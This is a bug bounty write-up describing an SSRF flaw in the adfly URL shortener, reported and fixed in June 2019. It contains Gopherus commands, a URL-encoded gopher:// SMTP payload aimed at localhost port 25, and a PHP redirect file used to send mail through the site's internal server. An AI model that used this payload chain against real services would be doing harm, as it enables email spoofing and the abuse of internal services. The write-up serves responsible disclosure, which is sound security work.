Hi guys, My name is Rafli pasya. Today i want to share my story about SSRF on adfly, this bug i found 4 days ago and already Fixed.
Two month ago i found IDOR on adfly, and 4 days ago i found SSRF on adfly, using this vulnerability i able to send an email using adfly SMTP. it’s absolutely Dangerous if another hacker using this to attack Adfly Client.
Exploitation
i prepared this tool :
1. Gopherus
2. Server to upload php file
First of all i tried to short a Gopher:// url but it’s blocked by server. so i make a php file contains Gopherus Payload and it’s actually work.
i opened a CMD and type :
gopherus.py —exploit fastcgi
this is used to exploit fastcgi and gain RCE, unfortunally because i unable to see response body (only able to see <title> tag) this exploit not work.
So i tried to use SMTP exploit :
gopherus.py — exploit smtp
From Mail : adf@ly
To Mail : [myemail@.x.y]
Subject: PoCSSRF
Text: [empty]
Payload :
gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.
Now i make a php file :
<?php
header(‘location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.’);
?>
and i upload it to my server.
then i visit adfly site and short myserver.com/poc.php
after 1–5 minutes i check my Inbox and see an email from adf@ly.adf.ly
i quickly Report this bug to their team. it’s fixed 1 day after i reported the bug.
Thx for Reading, soory for bad English btw.
Original WriteUp :
https://raflipasya19.blogspot.com/2019/06/adfly-ssrf-to-smtp-takeover.html
Timeline :
- Sunday 23 June 2019 23:35 GMT+7 = Bug Found & Reported
- Monday 24 June 2019 17:16 GMT+7 = Triaged
- Monday 24 June 2019 22:34 GMT+7 = Bug Fixed